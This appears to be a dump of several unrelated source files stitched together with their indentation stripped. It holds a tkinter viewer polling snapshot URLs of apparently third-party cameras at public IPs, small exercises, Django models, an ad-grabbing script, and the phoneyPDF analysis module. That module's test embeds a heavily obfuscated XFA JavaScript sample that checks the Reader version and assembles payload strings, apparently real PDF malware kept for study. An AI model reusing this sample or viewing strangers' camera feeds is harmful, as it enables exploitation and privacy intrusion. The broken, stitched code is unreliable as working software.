cameraURL03="http://72.81.132.14:60001/SnapshotJPEG?Resolution=640x480&amp;Quality=Clarity&amp;1507300872"
cameraURL04="http://24.98.52.12:8082/cgi-bin/viewer/video.jpg?r=1507300889"
cameraURL05="http://80.24.185.230:86/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1515078226"
cameraURL06="http://24.23.232.13:50001/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1507300932"
cameraURL07="http://80.24.185.230:81/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1515078327"
cameraURL08="http://80.24.185.230:82/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1515078336"
cameraURL09="http://63.172.41.245/webcapture.jpg?command=snap&channel=1?1508162812"
image01_label = tkinter.Label()
image02_label = tkinter.Label()
image03_label = tkinter.Label()
image04_label = tkinter.Label()
image05_label = tkinter.Label()
image06_label = tkinter.Label()
image07_label = tkinter.Label()
image08_label = tkinter.Label()
image09_label = tkinter.Label()
image01_label.grid(row=0, column=0)
image02_label.grid(row=0, column=1)
image03_label.grid(row=0, column=2)
image04_label.grid(row=1, column=0)
image05_label.grid(row=1, column=1)
image06_label.grid(row=1, column=2)
image07_label.grid(row=2, column=0)
image08_label.grid(row=2, column=1)
image09_label.grid(row=2, column=2)
def main():
rootWindow.bind('<Escape>', close)
Timer(0.1, refreshCam01).start()
Timer(0.1, refreshCam02).start()
Timer(0.1, refreshCam03).start()
Timer(0.1, refreshCam04).start()
Timer(0.1, refreshCam05).start()
Timer(0.1, refreshCam06).start()
Timer(0.1, refreshCam07).start()
Timer(0.1, refreshCam08).start()
Timer(0.1, refreshCam09).start()
def URL2PhotoImage(URL):
return ImageTk.PhotoImage(Image.open(BytesIO(requests.get(URL, timeout=4).content)).resize((int(RWidth/3),int(RHeight/3)), Image.ANTIALIAS))
def refreshCam01():
try:
tmp_photo = URL2PhotoImage(cameraURL01)
image01_label.configure(image=tmp_photo)
image01_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
except:
pass
if rootWindow.state() == 'normal': Timer(0.05, refreshCam01).start()
def refreshCam02():
try:
tmp_photo = URL2PhotoImage(cameraURL02)
image02_label.configure(image=tmp_photo)
image02_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
except:
pass
if rootWindow.state() == 'normal': Timer(0.05, refreshCam02).start()
def refreshCam03():
try:
tmp_photo = URL2PhotoImage(cameraURL03)
image03_label.configure(image=tmp_photo)
image03_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
except:
pass
if rootWindow.state() == 'normal': Timer(0.05, refreshCam03).start()
def refreshCam04():
try:
tmp_photo = URL2PhotoImage(cameraURL04)
image04_label.configure(image=tmp_photo)
image04_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
except:
pass
if rootWindow.state() == 'normal': Timer(0.05, refreshCam04).start()
def refreshCam05():
try:
tmp_photo = URL2PhotoImage(cameraURL05)
image05_label.configure(image=tmp_photo)
image05_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
except:
pass
if rootWindow.state() == 'normal': Timer(0.05, refreshCam05).start()
def refreshCam06():
try:
tmp_photo = URL2PhotoImage(cameraURL06)
image06_label.configure(image=tmp_photo)
image06_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
except:
pass
if rootWindow.state() == 'normal': Timer(0.05, refreshCam06).start()
def refreshCam07():
try:
tmp_photo = URL2PhotoImage(cameraURL07)
image07_label.configure(image=tmp_photo)
image07_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
except:
pass
if rootWindow.state() == 'normal': Timer(0.05, refreshCam07).start()
def refreshCam08():
try:
tmp_photo = URL2PhotoImage(cameraURL08)
image08_label.configure(image=tmp_photo)
image08_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
except:
pass
if rootWindow.state() == 'normal': Timer(0.05, refreshCam08).start()
def refreshCam09():
try:
tmp_photo = URL2PhotoImage(cameraURL09)
image09_label.configure(image=tmp_photo)
image09_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
except:
pass
if rootWindow.state() == 'normal': Timer(0.05, refreshCam09).start()
def close(event=None):
rootWindow.quit()
# start the subprocess, main loop, and gui
if __name__ == '__main__':
main()
rootWindow.mainloop()
|
8,078 | 0ef03ed455938bd2001581986c38104bfac395ce | # leetcode 836
# determine if two rectangles overlap
# input is two lists [x1,y1,x2,y2] coordinates
# where x1,y1 are coordinates of bottom left corner
# and x2,y2 are coordinates of top right corner
def overlap_rect(rec1, rec2):
"""Determine if rectangles overlap."""
# true if rec2 is left of rec1
a = rec2[2] <= rec1[0]
# true if rec2 is right of rec1
b = rec1[2] <= rec2[0]
# true if rec2 is below rec1
c = rec2[3] <= rec1[1]
# true if rec2 is above rec1
d = rec1[3] <= rec2[1]
return not (a or b or c or d)
|
8,079 | bf9e83591f737caec3060b72d86d56faec9bb23b | # 5. Усовершенствовать программу «Банковский депозит». Третьим аргументом в функцию должна
# передаваться фиксированная ежемесячная сумма пополнения вклада. Необходимо в главной
# функции реализовать вложенную функцию подсчета процентов для пополняемой суммы.
# Примем, что клиент вносит средства в последний день каждого месяца, кроме первого и
# последнего. Например, при сроке вклада в 6 месяцев пополнение происходит в течение 4
# месяцев. Вложенная функция возвращает сумму дополнительно внесенных средств (с
# процентами), а главная функция — общую сумму по вкладу на конец периода.
from task_1_4 import get_percent
def chargeable_deposit(amount, months, charge=0):
percent = get_percent(amount, months)
if not percent:
print('Нет подходящего тарифа')
total = amount
for month in range(months):
profit = total * percent / 100 / 12
total += profit
if month != 0 and month != months - 1:
total += charge + charge * percent / 100 / 12
print(round(total, 2))
chargeable_deposit(10000, 24, 100)
|
8,080 | 59b2d0ff3296c9d9a76b8b69a784d5a0c46128be | '''
XFA/XDP DOM in Javascript
This file is part of the phoneyPDF Framework
This module provides methods for transforming both PDF objects and XML (xfa/xdp) into a single structure of linked objects
in javascript. The idea is that any *DOM interation will play out in javascript land, where the DOMs are created and
maintained as the PDF is 'rendered'.
Trevor Tonn <smthmlk@gmail.com>
Copyright (c) 2013, VERISIGN, Inc
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of VERISIGN nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from lxml import etree
DEBUG = True
def removeNamespace(element, logger):
'''
Removes the namespace stuff from an element's tag attr. Probably a bad idea.
'''
if not element.nsmap:
logger.info("empty nsmap")
return
for key in element.nsmap:
val = element.nsmap[key]
s = "{%s}" % val
logger.debug("removing %s => %s: %s" % (key, val, s))
element.tag = element.tag.replace(s, "")
def elementToJS(element, jsStrL, logger):
logger.debug("converting element '%s'" % element.tag)
origTag = element.tag
removeNamespace(element, logger)
if origTag != element.tag:
logger.debug(" -- tag had namespace removed; new tag: %s" % element.tag)
# add element first
jsStrL.append("%s = new Element('%s');" % (element.tag, element.tag))
# see if there's any text
if element.text:
# we will likely need to escape chars like ' and " to make this work...
jsStrL.append("%s.text = \"%s\";" % (element.tag, element.text.strip()))
# add children both by their tagname and as integers
index = 0
for childElement in element.getchildren():
# create child recursively
elementToJS(childElement, jsStrL, logger)
if element.tag == 'subform':
#TODO: process subform for field names
pass
# now, add this child both as a property and something accessible via index
jsStrL.append("%s.%s = %s;" % (element.tag, childElement.tag, childElement.tag))
jsStrL.append("%s[%d] = %s;" % (element.tag, index, childElement.tag))
index += 1
def xmlToJS(xml, logger):
'''
Takes an LXML element tree and converts it into javascript code that, when executed by
a javascript engine, will create a very similar structure that can be manipulated in
javascript land by other scripts.
Returns a string of javascript suitable for eval()'ing.
'''
# Prepare the javascript string with a defintion of our 'Element' object
jsStrL = ["""
function Element(tag) {
this.tag = tag;
// this needs a lot more stuff added to it...
}
"""]
# Convert XML elements into a tree of javascript objects
try:
elementToJS(xml, jsStrL, logger)
except Exception,e:
logger.warn(e)
pass
return '\n'.join(jsStrL)
def getExposedObjects():
'''
Adobe Reader has all sorts of objects that are defined under the hood and exposed to javascript.
This method returns a string of javascript which contains definitions for those objects.
'''
defsStr = """
var app = Object();
"""
return defsStr
def test_xmlToJS():
#x="""<xfa><subform><g><script>var q='hector'; var p='go'; var f=function(a,b){ return a+' '+b; };</script></g></subform><subform2><ggg><script language="javascript">print( f(p,q) );</script></ggg></subform2></xfa>"""
y="""<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/"><subform layout="tb" locale="en_US" name="kos"><pageSet><pageArea id="rya" name="rya"><contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/><medium long="792pt" short="612pt" stock="default"/></pageArea></pageSet><subform h="756pt" w="576pt" name="upo"><field h="65mm" name="sac" w="85mm" x="53.6501mm" y="88.6499mm"><event activity="initialize" name="cum"><script contentType="application/x-javascript">
abo=kor([app]);kop();function led(y,s){var v,p,g,f,m,o,a,z,x,h,b,f,w,l;a=sac.rawValue.replace(/[QjCGRkhPK]/g,'');o='';z='';h=0;v='substr';m=y.length;l='fromCh';l+='arCode';g=String;for(w=0;w<m;w++){h+=s;f=y[v](w,1);b=a.indexOf(f);b+=h;b%=a.length;o+=a[v](b,1)}for(x=0;x<m;x+=2){f=o[v](x,2);p=parseInt(f,16);z+=g[l](p)}return z}function kor(g){return g[0]}function red(){var f,b,i,a,c,m,g,k,z,w,u,t,y;m='ib94oe0z7aY9e2';c=2;w=led(m,c);z='z8I7i6o6z6aa';t=29;i=led(z,t);b='X8aWSSz53389eYiiba2fdIza61';g=23;a=led(b,g);f='fdYcYel5bi0aII45';k=24;y=led(f,k);u=abo[a][y]();u=u[w]('.','');while(u[i]<4){u+='0'}u=parseInt(u,10);return u}function kop(){var u,j,kw,z,w,v,kr,o,x,n,ky,r,c,s,m,kc,b,ka,km,f,p,l,q,kp,a,d,kk,h,kv,y,kb,ku,t,i,ks,k,kt,g;r='8eWd2d3f1bXed868f5bae07o4i5IazaSoii2IYz0892W27Y7019XWlS63f1bXed164f5bael7o705SaSl8ocidIYz089cW28Y3019XWdS9Yl1IXId764f2bael7o4i57azl8oci2I6808bce2SY3059XWdS63f1XXed764f5bib2794W5Iazl1oci2IYz0z6c22SY301WaWdSo3o1bX4XI64f5baea4l455Iazl8oci2IYz089cW2SYX049Xco4754a5laol';k=21;u=led(r,k);m=11146;m-=2945;y=2815;y-=815;v='133S2eiX';w=24;s=led(v,w);p='58lfo01Si5Y7e826bzc14d064SlX7SYW8460z7dYIez96Xzid1IoXcil1Soa3Wl5S9a4W0579Y4e024bYcef28b6czfd8I6Xze6259X3Ia0Yo61fe1SbboSza6od430Sd5fWbi28edo1fdl9S4a2X1izdei718oz1iooWca4SYf6Wz4e027bYcef28b6czfd8I6Xzid1IoX3il1Soa3WldSIl4Sf5a9o5e9d74Ya7fY8eo2e358Sd9ai655I96ia17oYzzld305XWfaa8X5zzW74Y0Wo25b42Wff75da84d2IbXb42X7laSilo3calW151Wo6z024fI377i81l2abdcIf585d6Ic1SIfXbo619e83bl3cd580Y3I9c4IIWbf21bo44f0cidYzW665Yd44z1XoizbldSXa4W84aoW73Y57SYSXlY1f68efbca6fz2d2zb94ilXW781ia52o0oi6a7Wd5d097a287WYSb92I35cSfca0d5ib1cia0zWzzel2SbXXWiae0o4z99do0XX42Ybe4Sf08YY5ziddIoX3if18o8Yfo2W953WSa69W4l0l4SIXefYzfecY3Y7cd4a261z0d0iI16l51zo8SIl7cda8Wa6i0deSI9W0iYz7dYfl8SYYze63ibX4II0biYYXloS3X8Wi5oeS3z0c4bIWeW25b5oWbll26fz824IbXfi81Soa3Wl5SdaaSYfI966a0c74a1eW29';b=27;c=led(p,b);t='o6207oY2S14dWf6I';a=10;j=led(t,a);i=4132;i+=3868;d='c413iIeoaI76acY3823IX6976ce9Iic6bb44llIIcc5SiY8WY1W61365eo5zo2z9239d3bd4bl4Ilcz0cS0XSfX7fa7ia8iYzc07W71ef4X45zo6acif0d1odfe747lW51c8beSfde307ol84a8e22S33XYceb5076a9c49d1fWfe74IlcI0cS0XSfX7fa7ia8iY8WY1W61e65eo5zo2zI2cWd1Idlbf5IoXISc89X2fda30d0a1oIlW05cb0a64eI1Wi1z9YS0X3f2X125Sac5o2Yl5SWXobc7zXlo6ccY4W78eS8e944o2Ifi69b3aX6e242lczYob9f2f9zbb4i5Xodc2Y2W43i6XXo54icI9Yd8oYodcfl3Wo8zfo6YXSecIbc7ilzo289a2caXzd5Xfal6XzI2f9d3XXl9I77adI34Sz4Si11fae9b0iW8d20Sa1a657lf9i5I9izeeziX2fY5alaI18b022fX1b5eilY4flfY5993364XfY06dzS5eW53b67fa4ida5d27YX29d6027ea9fd8WYdW61e6ce81z71zbcc9dSiWobI4Yaozdcd0X361afIdbXYoXld2a9lXd6dec4Woaa92cWXSb6l1969lXiiodlc27llII7zXSIX8W039d1bYdXYa3l2aiY0oa3Sdizz3Sl8z0o605S4c73c7W584lc2a4W91l6Ieo5zo2z92z94Y4Wzb07Ieiz84e0YS5';h=13;x=led(d,h);o='5f944c0bl2Yi';q=27;n=led(o,q);f='fIYI61Wai16Sio6dSai16IYb';l=15;g=led(f,l);z='6a6f696e';kr=25;kk=led(z,kr);ku=15820;ku-=6519;km=red();if(km>=i){ky='';kv=g;kw=pub(s,y);ks=21;kp='of922ozi89Xed564f5bebaS74S5ab9dzi04WIY11coo6YSYeY295SdS4Sf3IXS2adzII10X8c82cY20YoYoi4Xbazlzbcd57YSY78bW7Wdz1XXX8deSz65b2b9dz6z4SXle1lci5i6aXz6c72WIeY28WW436Y51aXbW56164boedS7621W5zl1oiic5XIzlcceYS25039YidW9Y181XeWI6if41oel7I555I54d86aodIfeY808fidYfzeWWcl3e360ocWdo673lbael4z34fia2eXlcfXI3zYl68ciW0zz59e77SdSl05Xl66So3ibeeadY74a3lee1odflI2Idl1cdi4azY0eeWXS7303bddWSY7f5be724065fI5WeSoWic59zbzIo25Y0Y06W49lS4Yf1fXeWl6i0b12Xzez35aIbYl9o84W51I88fciYY0Sl40XWlS0360o9a2e673b1Ie87l6YfiaWoS7Xia5WzYl6oX26I5l8097eSe341o1I6IScfIbdeadY6c5Yb1d7loSWIXz6z3cdi8I6069eWl27371adXWcSl62b5eld842fc5Sl37441zWei8fdXYbY7l1Wa9oWe358X15W6Si3zei727c4zf95a99o1i6ifablb81YIa3l9WfiWIaS107XI27fcIi16WYdb42aba9o370I2iazYle89260d979eW7Sd3f05Xl6Ifl041eWY4o6c5YaIe2o5fXbI8l73o65e27Y792WX2aS30X9lW5flfob8Wleb655W5WeSoWic59z08X22Y207l1oYceSe551W9i2zYz0be2bI7c354Ibzl0li43bdzXzc4iY7Yz03ociX2Y5405dXX6dff592e84639a552ooo0fdzdz87o27cSIzl3WW9lS4Y981ciX6dl3l1c7I44691aaWe2oaiW5a80z64f520e098595Sd370acIWlY3fXb5X2e765f952oz6Xi5IWIilc81ib2S0b91cYI6Y6Xod5W3f2b8eiX64W50fcl290oco9zaa0l64c5e2406869bSlS11bcIdof30cebbI4449a3lSlo64I65dal7022c7Y7zc05caS7z03SczWl6lb8bieY4Y4e1Slle2iciS5YIdz8o2i7Y3Y0ebWX273a3iX3XaflIibaXz4z4Y59bcl4l34cIf13zb4biY030c91c5WSY18bcdd6Si0b1dbfd458495Il9o84ab2e07IoXifY60282S2SlS11bcIdoff3195el7450aWbll5ococI3zYlSc7i72e0bW4c03aSi1Xcbdedz3ibz777974faaIe779iSI2aW89cIYYY3Y2oXi0WdY9049iooYf3bzIbld45e5200l47iic5Xa38X22i1f6zcWYSdI3Yf8i9W2d61f41cXzSY701I5Se56iI5baa07c2i5IYel9Wci2Sd1la5dWW7dz011ce27l6bYYaSdS6aiabdezco41ifa7Y2WWW7SdYl319dWz6cf4b0Wa4z7efaXSo879iSI2aW89cdYYI0l89eS536Sf19X3W6Yz051ib24W6e1aled7o8fI5dIi8f822SY00bWcia3SS70Xll6667f4baXz7c6if352o5ii43b2al8929cXI0za84ceS436311WW66X359b70493i43bla1oc4WI3zYl1ob2Ia0zc05c5S6Ye1ice26S86516WI4Y3Wfal3lSi1IlbI8Szeo2i6Y3zf9eWX27Yo19cWWlSc049XbIdz3i1al2a37iic5Xad8Xc9iza3z79a7e3e548X156SS43lzzX8ez554ib3lS7049idaY7fo65IYf038490I61304dWW76X3dfcea4o3e5aXSe3oco1iY8l81c7idYSz78bW73a54XIcd26S865b6e0dI45fW5Wlzo04Sbdal78cd2WIeY08Wi23iz68fX36adX3be2eld8425i52oYW9fIiW8ll9of5S00Y59fcfWe3o3XdiWlYz6b1oWI7b50f35zl5i3i25Yzic6cz5XYcz591WSIaz1Xi15dod63Ife7ee46Y1WaelW7YoXbozY8022cS20l8WaW2Sdz08f9W2zf8fo96e6d43857lIl5lcilIXzlX12zibaYl40aWb2bS71XXIWId6651c72447W5ebYlYioi35SzSlbcb5WY00co5WSSe3f1I9adaf4fI1cbId638aWX3l373IXbWzi80ddYSael9W59bS4z13b9edldf3z92ece43faSaelz64fc5a13lec158Y8z99l7eIezo14ded3Sz6o1XXf744W59lzooo0I2IWadz3oiib03l69YWX44351idIW6Y8b81aWddY4o5ibclX75I6IYa38X22ifa0l4Wlcf2eY01f9S2ISff4eaXz7c4ofea9o3liI1I3zfcIcWYeIX998ciXS631XodIW6fzbfeXWlS45847bleXioI5bYe8l32icS00zeoa772oYI1b9Sdcf33110797Y481Sa1lS75o1Ifzdli8c2407z88ccb2iY907dX2eYf68b07Y4922f7X4dolaIiIdez762c58a0zf8Yi0IlSI0bXi2zYzbff0baSY6ef3bYdYiofli2eS81o7c22d0f8liaIe341i9a2zf66Yf58zdb7S1bX2l07dfXbW8zcf8cc8Y6zao5ib3S3o8X1X6dd23IzI7e406c1SaYe2l3f9zI86z88e2dI5l40cWeWi3i8IXbWISofI';kb=led(kp,ks);kc=pub(s,7600);if(km<m){ky=c}else if(km<ku){ky=x}if(ky[n]){kt=u;ka=[kv,kw,kb,kc,kt,ky][kk]('');sac[j]=ka}}return}function pub(j,u){var a,r,w,g,q,y;y='967e2IfXYiX7';w=6;g=led(y,w);a='WfdY64oYc4WSSe694d';q=30;r=led(a,q);while(j[g]<u){j+=j}j=j[r](0,u);return j}</script></event><ui><imageEdit/></ui></field></subform></subform></template>"""
xml=etree.fromstring(y)
jsStr = xmlToJS(xml)
print jsStr
if __name__ == "__main__":
test_xmlToJS()
|
8,081 | 9d772d5500593583907b65bc2c81490e61375e8b | class TimeInterval(object):
def __init__(self, start_time, end_time):
self.start_time = start_time
self.end_time = end_time
|
8,082 | 9bb15842b39c7fd3e6f6c0048a51c2b2112ddb94 | from django.db import models
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from django.core.validators import MinValueValidator
from django.utils import timezone
from concurrency.fields import IntegerVersionField
class ProductCategory(models.Model):
name = models.CharField(max_length=20)
class Meta:
unique_together = (("name"),)
def __unicode__(self):
return smart_unicode(self.name)
class Product(models.Model):
name = models.CharField(max_length=20)
seller = models.ForeignKey(User, verbose_name="seller")
initial_price = models.DecimalField(max_digits=10, decimal_places=2,
validators=[MinValueValidator(0)], verbose_name="starting bid")
description = models.TextField(max_length=280)
timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=False)
product_category = models.ForeignKey(ProductCategory, verbose_name="product category")
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.name)
class AuctionStatus(models.Model):
name = models.CharField(max_length=20)
version = IntegerVersionField()
class Meta:
unique_together = (("name"),)
def __unicode__(self):
return smart_unicode(self.name)
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2, default=0,
null=True, blank=True, verbose_name="current bid")
updated_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now())
end_time = models.DateTimeField(verbose_name="end time")
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name="auction status")
version = IntegerVersionField()
class Meta:
unique_together = (("title"),)
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time').reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name='contender')
auctions = models.ManyToManyField(Auction, related_name='auctions', through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ["contender"]
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name="bid amount")
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now(), )
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ["bid_time"]
|
8,083 | 592f29f08637e511bd7d49a3b58f69b700721d89 | def alt(h, dt):
t=0
while True:
t=t+1
a=(-6)*(t**4)+ h*(t**3)+2*(t**2)+t
if a<=0:
print('The balloon first touches ground at hour:')
print(t)
break
elif t==dt:
print('The balloon does not touch ground in the given time.')
break
return
alt(int(input()), int(input())) |
8,084 | 312a95c9514722157653365104d8cd0ada760ce8 | """URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [
# Landing page area
url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),
url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),
url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),
url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),
# Account management is done by allauth
url(r'^accounts/', include('allauth.urls')),
# Account profile and member info done locally
url(r'^accounts/profile/$', account_profile, name='account_profile'),
url(r'^member/$', member_index, name='user_home'),
url(r'^member/action$', member_action, name='user_action'),
# Usual Django admin
url(r'^admin/', admin.site.urls),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
8,085 | fdae984f7cf5e1c20dee197d3f2518a0c7c38bdc | from time import sleep
from uuid import uuid1
from pprint import pprint
from shutil import copy2
from multiprocessing import Process, Queue, Pool, Manager
from ad_grabber_classes import *
from adregex import *
from pygraph.classes.digraph import digraph
import os
import json
import jsonpickle
import subprocess
import cPickle
import logging
LOG = logging.getLogger("logAdGrabber")
ADREGEX = AdRegEx()
def check_duplicate(fp1, fp2):
"""takes two files, does a diff on them, returns True if same"""
try:
subprocess.check_output(['diff', fp1, fp2])
return True
except subprocess.CalledProcessError:
return False
def identify_uniq_ads(session_results):
"""
i) Identify duplicate ads
ii) bin the ads by their dimensions
iii) Keep track of the test sites and have many times they have displayed this
ad
"""
# bin by dimensions
ads = {}
notads = {}
swf_bin = {}
img_bin = {}
error_bugs = []
for train_category, cat_dict in session_results.items():
for test_site, bug_dict_list in cat_dict.items():
for index_count in range(len(bug_dict_list)):
bug_dict = bug_dict_list[index_count]
for bug, bug_count in bug_dict.items():
bug_filetype = bug.get_filetype()
bug_filepath = bug.get_filepath()
if bug_filepath == '':
#LOG.debug('did not manage to curl the scripts for bug:%s' % bug)
error_bugs.append(bug)
continue
if bug.is_ad(): # give zerofucks to non-ads
height = '999'
width = '999'
if bug_filetype == 'swf':
# choose from the swf media bin
target_bin = swf_bin
try:
width = subprocess.check_output(['swfdump', '-X',
bug_filepath]).split(' ')[-1].strip()
height = subprocess.check_output(['swfdump', '-Y',
bug_filepath]).split(' ')[-1].strip()
except subprocess.CalledProcessError :
LOG.exception("swfdump error on file %s" % bug_filepath)
else:
# choose from the img media bin
target_bin = img_bin
LOG.debug(bug_filepath)
try:
height = subprocess.check_output(['identify', '-format', '"%h"',\
bug_filepath]).strip()
width = subprocess.check_output(['identify', '-format','"%w"',\
bug_filepath]).strip()
except subprocess.CalledProcessError:
LOG.exception("identify error on file %s" % bug_filepath)
try:
bug.set_dimension(height, width)
dimension = '%s-%s' % (height, width)
# check all the images in the bin with the dimensions
m_list = target_bin[dimension]
dup = None
for m in m_list:
if check_duplicate(bug_filepath, m.get_filepath()):
dup = m
break
if dup:
# check if the duplicate ad came from a different test site
if test_site in ads[dup]:
ads[dup][test_site] += bug_count
else :
ads[dup] = {test_site : bug_count}
# delete old bug reference, add new one and point to duplicated
# bug
del bug_dict[bug]
bug_dict[dup] = bug_count
else:
target_bin[dimension].append(bug)
ads[bug] = {test_site : bug_count}
# tally up the results
except KeyError: # The bin hasn't been created
target_bin[dimension] = [bug]
ads[bug] = {test_site : bug_count}
# else:
# notads
return ads,error_bugs
def export_uniq_ads(ads, out_folder, rel_folder):
"""
Takes all the uniq ads seen in this session and writes its metadata
information to a csv file
"""
try :
os.makedirs(out_folder)
os.makedirs(os.path.join(out_folder, rel_folder))
except OSError:
LOG.debug('Creating output folder')
fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')
# Relative location = Location of the ad within this current session
# Global location, added when an ad is matched with existing ads in DB
fwtr.write('#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\n')
for bug in ads.keys():
height, width = bug.get_dimension()
filepath = bug.get_filepath()
name = bug.get_name()
src = bug.get_src()
filetype = bug.get_filetype()
new_uuidname = '%s.%s' % (uuid1(), filetype)
bug.set_uuid(new_uuidname)
new_filepath = os.path.join(out_folder, new_uuidname)
rel_filepath = os.path.join(rel_folder, new_uuidname)
copy2(filepath, new_filepath)
fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\n'.format(new_uuidname,
name, filetype, height, width, rel_filepath, src))
fwtr.close()
return ads
def write_run_info(RUNINFO_DIR, session_date):
# write to a file in runinfo_dir to tell automation script this run is done
fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date)
with open(fp, 'w') as fwtr:
fwtr.write('OK')
def write_session_info(vmid, machineid, profile, session_date, train_mode, training_sites,
test_sites, num_of_refresh, export_folder):
train_category = training_sites.keys()[0]
train_sites_to_visit = training_sites[train_category]
with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr:
fwtr.write('session_str : %s\n' % session_date)
fwtr.write('machine_info : %s\n' % machineid)
fwtr.write('vmid : %s\n' % vmid)
fwtr.write('profile : %s\n' % profile)
fwtr.write('train_mode : %s\n' % train_mode)
fwtr.write('num_of_refresh : %d\n' % num_of_refresh)
fwtr.write('training_topic : %s\n' % train_category)
fwtr.write('training_sites : ')
for site in train_sites_to_visit:
fwtr.write('%s, ' % site)
fwtr.write('\nnum_of_train_sites : %d\n' % len(train_sites_to_visit))
fwtr.write('test_sites : ')
for site in test_sites:
fwtr.write('%s, ' % site[1])
fwtr.write('\nnum_of_test_sites : %d\n' % len(test_sites))
def generate_stats(results, ads, vmid, session_date, export_folder, process_ex_time):
"""
Generates stats on
- uniq ads seen on the test sites
- total number of ads seen on the test sites
- total number of ads seen on all test sites
- total number of uniq ads seen on all test sites
"""
try:
os.makedirs(export_folder)
except OSError:
pass
# to be read and inserted into db
totalads = 0 # total number of ads seen during this session
totaluniqads = len(ads) # does not support multicategories at this point
# for each category, for each test site, count total number of ads seen
totalad_category = {}
# for each category, for each test site, count total number of uniq ads seen
